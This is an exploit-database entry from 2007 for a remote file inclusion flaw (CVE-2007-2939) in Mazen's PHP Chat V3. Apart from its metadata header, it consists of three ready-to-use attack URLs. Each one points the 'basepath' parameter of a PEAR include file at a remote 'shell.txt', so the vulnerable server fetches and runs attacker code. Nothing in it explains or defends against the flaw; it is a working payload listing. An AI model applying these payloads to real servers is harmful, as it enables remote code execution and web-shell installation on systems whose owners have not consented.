Mazens PHP Chat V3 basepath - Remote File Inclusion Vulnerabilities

2007-05-26T00:00:00
ID EDB-ID:3994
Type exploitdb
Reporter ThE TiGeR
Modified 2007-05-26T00:00:00

Description

Mazens PHP Chat V3 (basepath) Remote File Inclusion Vulnerabilities. CVE-2007-2939. Webapps exploit for php platform

                                        
                                            #Mazen's PHP Chat V3.0.0 Beta1 Remote file inclusion

#Download script : http://www.scriptbrasil.com.br/script/php/bate_papo/mazen_phpopenchmt221.tar.gz

#Thanks Str0ke :D

#Exploit :

#http://victim.com/[chat_path]/include/pear/ITX.php?basepath=shell.txt?
#http://victim.com/[chat_path]/include/pear/IT_Error.php?basepath=shell.txt?
#http://victim.com/[chat_path]/include/pear/IT.php?basepath= shell.txt?

#Discovered by ThE TiGeR

#Miro_Tiger[at]Hotmail.com

# milw0rm.com [2007-05-26]